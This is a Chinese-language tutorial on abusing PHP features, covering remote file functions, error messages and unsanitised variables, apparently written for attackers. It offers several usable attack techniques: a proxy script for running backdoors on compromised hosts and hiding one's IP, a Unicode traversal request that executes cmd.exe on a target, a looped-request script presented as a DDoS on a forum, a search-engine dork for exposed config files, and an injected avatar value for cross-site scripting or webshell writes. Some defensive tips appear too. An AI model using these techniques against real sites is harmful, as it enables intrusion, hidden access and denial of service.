1．遠(yuǎn)程文件
PHP是一門具有豐富特性的語言，它提供了大量函數(shù)，使程序員能夠方便地實(shí)現(xiàn)各種功能，遠(yuǎn)程文件就是一個(gè)很好的例子：
代碼  
<?php
$fp=@Fopen($url,"r") or die ("cannot open $url");
while($line=@fgets($fp,1024)) {
$contents.=$line;
}
echo $contents; //顯示文件內(nèi)容
fclose($fp); //關(guān)閉文件
?>
以上是一段利用Fopen函數(shù)打開文件的代碼，由于Fopen函數(shù)支持遠(yuǎn)程文件，使得它應(yīng)用起來相當(dāng)有趣，將以上代碼保存為Proxy.php，然后后提交：
代碼  
/proxy.php?url=http://www.hacker.com.cn/bbs
這時(shí)候你會(huì)發(fā)現(xiàn)論壇下方顯示的IP地址變成了PHP腳本所處服務(wù)器的IP地址。Fopen函數(shù)可以從任何其Web或FTP站點(diǎn)讀取文件，事實(shí)上PHP的大多數(shù)文件處理函數(shù)對遠(yuǎn)程文件都是透明的，比如請求：
代碼  
/proxy.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir
這樣實(shí)際上是利用了Target主機(jī)上的Unicode漏洞，執(zhí)行了DIR命令。但并不是所有的服務(wù)器都支持遠(yuǎn)程文件的功能，如果你使用的是商業(yè)的服務(wù)器，很可能會(huì)發(fā)現(xiàn)遠(yuǎn)程文件使用不了（如51的虛擬主機(jī)），這是因?yàn)樵谏虡I(yè)主機(jī)上限制遠(yuǎn)程文件的功能，往往能夠更好的保護(hù)服務(wù)器的正常運(yùn)行。你可以通過PHPinfo()查看服務(wù)器是否支持這種功能。當(dāng)然，在PHPinfo()被禁用的情況下，也可以使用Get_cfg_var()：
代碼  
<?php
echo "是否允許使用遠(yuǎn)程文件（allow_url_Fopen）";
?php
if (get_cfg_var("allow_url_Fopen")=="1")
{
echo("<font color=green><b>是</b></font>");
}
else echo("<font color=red><b>否</b></font>");
?>
當(dāng)Allow_url_Fopen一項(xiàng)參數(shù)為ON時(shí)，即支持遠(yuǎn)程文件的功能。充分發(fā)揮遠(yuǎn)程文件的特性，我們可以實(shí)現(xiàn)許多特殊的功能：如果你是用過PHP Flame的最新版本，你會(huì)發(fā)現(xiàn)它在集文件夾復(fù)制、文本搜索等功能的基礎(chǔ)上，又增加了Web間文件傳輸?shù)墓δ埽揽窟@種功能，你可以隨意將其他服務(wù)器上的文件傳送到你的Web目錄下。而且，在兩臺(tái)服務(wù)器間傳送文件有著飛快的傳輸速度。我們看看實(shí)現(xiàn)這個(gè)功能的代碼：
代碼  
<?php
$fp = Fopen($_GET['filename'], 'rb'); //打開文件
$data = $tmp = '';
while ( true ) {
$tmp = fgets($fp, 1024);
if ( 0 === strlen($tmp) ) {
break; //跳出while循環(huán)
}
$data .= $tmp;
}
fclose($fp); //關(guān)閉文件
$file=preg_replace("/^.+\//","",$filename);//轉(zhuǎn)換文件名
//write
$fp = Fopen("$file", 'wb'); //生成文件
fwrite($fp, $data); //寫入數(shù)據(jù)
fclose($fp);
?>  
在調(diào)用Fopen和Fwrite函數(shù)時(shí)加入"b"標(biāo)記，可以使這兩個(gè)函數(shù)安全運(yùn)用于二進(jìn)制文件而不損壞數(shù)據(jù)。在以上腳本提交：
/down.php?filename=http://www.chinaz.com/winrar.zip
這時(shí)便會(huì)在Down.php的所處目錄下生成相應(yīng)的Winrar.zip文件。如果再配合遍歷目錄的功能，你將可以實(shí)現(xiàn)多個(gè)文件夾服務(wù)器間的傳輸。但是，遠(yuǎn)程文件應(yīng)該還有更大的發(fā)揮空間，比如寫SQL Injection攻擊的自動(dòng)腳本，甚至是HTTP的代理服務(wù)：
代碼  
<?
$url = getenv("QUERY_STRING");
if(!ereg("^http",$url)) //檢查輸入的URL格式
{
echo "例子：<br>http://www.163.com/<br>";
echo "http://www.xxxx.com/list.php?id=600<br>";
echo "當(dāng)URL為目錄時(shí)需要在目錄后加入"/"";
exit;
}
if($url)
$url=str_replace("\\","/",$url);
$f=@Fopen($url,"r");  //打開文件
$a="";
if($f)
{
while(!feof($f))
$a.=@fread($f,8000);  //讀取文件
fclose($f);
}
$rooturl = preg_replace("/(.+\/)(.*)/i","\\1",$url);  //轉(zhuǎn)換根目錄
$a = preg_replace("/(src[[:space:]]*=['\"])([^h].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(src[[:space:]]*=)([^h'\"].*?)/is","\\1$rooturl\\2",$a);  //轉(zhuǎn)換圖片地址
$a = preg_replace("/(action[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=)([^h'\"].*?)/is","\\1$php_self?$rooturl\\2",$a);  //轉(zhuǎn)換POST地址
$a = preg_replace("/(<a.+?href[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=[^'\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);//轉(zhuǎn)換鏈接地址
$a = preg_replace("/(link.+?href[[:space:]]*=[^'\"])(.*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=['\"])(.*?)/is","\\1$rooturl\\2",$a); //轉(zhuǎn)換樣式表地址
echo $a;
exit;
?>
在正則表達(dá)式的幫助下，以上代碼能夠自行地將返回頁面中包含的鏈接和圖片進(jìn)行轉(zhuǎn)換，并把頁面內(nèi)的鏈接自動(dòng)提交到當(dāng)前PHP腳本的$url中。例如提交：
/proxy.php?http://www.xfocus.net/
腳本將會(huì)返回http://www.xfocus.net/的內(nèi)容，如圖1所示。
圖1
當(dāng)然，這運(yùn)用的絕對不僅僅是框架的技巧。運(yùn)用這個(gè)腳本你可以遠(yuǎn)程操作安置在其他服務(wù)器的Web后門，或者將肉雞做成一個(gè)簡單的HTTP代理，從而更好的隱藏自己的IP。如果使用PHP編寫CGI掃描工具，你需要延長PHP的有效運(yùn)行時(shí)間。以下是兩種有效的方法，當(dāng)然你也可以將PHP代碼編譯成GUI界面，從而解決這個(gè)問題。設(shè)置PHP的有效運(yùn)行時(shí)間為三分鐘：
代碼  
<? ini_set("max_execution_time",60*3); ?>
<? set_time_limit(60*3); ?>
我們再看看這種功能在DDOS攻擊中的應(yīng)用：
代碼  
<?php
set_time_limit(60*3);
$url="http://www.xxx.com/bbs/userlist.php?userid=";
for($i=1131;$i<=1180;$i++)
{
$urls=$url.$i; //將$url與$i鏈接在一起
$f=@Fopen($urls,"r"); //請求$urls
$a=@fread($f,10);  //取出部分內(nèi)容
fclose($f); //關(guān)閉$urls
}
?>  
以上用For循環(huán)不斷地請求Userlist.php?userid＝$i的內(nèi)容（$i的值每次都是不同的），但是打開后僅僅取出幾個(gè)字節(jié)便關(guān)閉這個(gè)腳本了。PHP運(yùn)行在虛擬主機(jī)上，10秒鐘便可以打開幾十個(gè)URL，當(dāng)同時(shí)運(yùn)行多個(gè)進(jìn)程時(shí)，便有可能實(shí)現(xiàn)DDOS攻擊，讓對方的論壇迅速崩潰。
限于版面，遠(yuǎn)程文件的內(nèi)容就先說到這里了，如果你還有不明白的地方，請參考以下的這篇文章：《在PHP中使用遠(yuǎn)程文件》
2．錯(cuò)誤回顯
PHP在默認(rèn)的情況下打開錯(cuò)誤回顯，這樣可以便于程序員在調(diào)試腳本時(shí)發(fā)現(xiàn)代碼的錯(cuò)誤，但是這也往往使Web暴露了PHP的代碼和服務(wù)器的一些數(shù)據(jù)。PHP對代碼的規(guī)范性要求比較嚴(yán)格，以下是一種比較常見的錯(cuò)誤回顯：
warning:file("data/1120\'.htm)-no such file or
directory in /usr/home/xxxxx.com/show.php on line 300
這種錯(cuò)誤回顯，至少告訴了我們?nèi)齻€(gè)信息：服務(wù)器的操作系統(tǒng)是LINUX；服務(wù)器使用文本數(shù)據(jù)庫；Show.php的第300行代碼為"file ("./data/1120/".$data.".htm")"。
這種錯(cuò)誤回顯，已經(jīng)足以成為一臺(tái)服務(wù)器致命的漏洞。從另一個(gè)利用的角度來看，我們發(fā)現(xiàn)一般的PHP錯(cuò)誤回都包含了"warning"字符，但是這有什么用呢？我們得先認(rèn)識(shí)一下PHP的庫文件。
PHP的Include()和Require()主要是為了支持代碼庫，因?yàn)槲覀円话闶前岩恍┙?jīng)常使用的函數(shù)放到一個(gè)獨(dú)立的文件中，這個(gè)獨(dú)立的文件就是代碼庫，當(dāng)需要使用其中的函數(shù)時(shí)，我們只要把這個(gè)代碼庫包含到當(dāng)前的文件中就可以了。
最初，人們開發(fā)和發(fā)布PHP程序的時(shí)候，為了區(qū)別代碼庫和主程序代碼，一般是為代碼庫文件設(shè)置一個(gè)".inc"的擴(kuò)展名，但是他們很快發(fā)現(xiàn)這是一個(gè)錯(cuò)誤，因?yàn)檫@樣的文件無法被PHP解釋器正確解析為PHP代碼。如果我們直接請求服務(wù)器上的這種文件時(shí)，我們就會(huì)得到該文件的源代碼，這是因?yàn)楫?dāng)把PHP作為Apache的模塊使用時(shí)，PHP解釋器是根據(jù)文件的擴(kuò)展名來決定是否解析為PHP代碼的。擴(kuò)展名是站點(diǎn)管理員指定的，一般是".php"， ".php3"和".php4"。如果重要的配置數(shù)據(jù)被包含在沒有合適的擴(kuò)展名的PHP文件中，那么遠(yuǎn)程攻擊者將容易得到這些信息。
按照以往的程序員的習(xí)慣，往往會(huì)把一些重要的文件設(shè)定"config.inc","coon.inc"等形式，如果我們在搜索引撃中搜索"warning+config.inc"，那么你會(huì)發(fā)現(xiàn)許多網(wǎng)站都暴露了".inc"文件的代碼，甚至包括許多商業(yè)和政府網(wǎng)站，如圖2所示。
圖2
要關(guān)閉PHP的錯(cuò)誤回顯通常有兩個(gè)方法，第一個(gè)是直接修改Php.ini中的設(shè)置，這我們以前已經(jīng)介紹過了；第二種方法是在PHP腳本中加入抑制錯(cuò)誤回顯的代碼，你可以在調(diào)用的函數(shù)前函數(shù)加入"@"字符，或者在PHP的代碼頂端加入"error_reporting(0)；"的代碼，要了解更多的內(nèi)容請參考PHP手冊中的"error_reporting"一節(jié)。
3．變量回顯
WEN的安全問題主要集中變量的處理上，對變量的處理不當(dāng)，會(huì)導(dǎo)致多種安全問題。先看一下的例子：
代碼  
<td width="400">
<select name="face">
<option value="1.gif">1.gif</option>
<option value="2.gif">2.gif</option>
......
$face的值按照程序員的意圖應(yīng)僅設(shè)定在下拉菜單中供用戶選擇，但是事實(shí)上我們可以通過POST的方法直接指定$face的值騙過程序：
&data=……" target="_blank">http://target/bbs/edit.php?action=reface&u...t>&data=......
程序接到$face的值后未經(jīng)過任何處理，便將它顯示出來了：
<img scr ="<? echo $face; ?>" >
從而導(dǎo)致了跨站腳本攻擊等安全問題，用這種方法，你甚至可以向PHP文本數(shù)據(jù)庫中寫入WebShell。作為程序員，你可以使用正則表達(dá)式檢查用戶的輸入內(nèi)容。如：
代碼  
<?php
if (ereg (">",$face)) {
echo "頭像有誤";
exit;}
?>
這僅是一種簡單的檢查方法，不要依賴于PHP自動(dòng)為特殊字符增加"\"的功能，這樣往往會(huì)讓你得到意想不到的惡果。
PHP就一門CGI語言而言，它的功能已不僅僅局限于編寫網(wǎng)站，它的一些安全問題也不可避免的存在，如：PHP的Safe Mode并不能真正限制EXE文件的運(yùn)行；PHP也可以編寫GUI界面的程序；由于"include"等函數(shù)的存在使得PHP后門根本不可能被查殺；PHP同樣能夠使用多線程處理命令。以不同的角度看PHP，你才能更充分發(fā)揮它功能。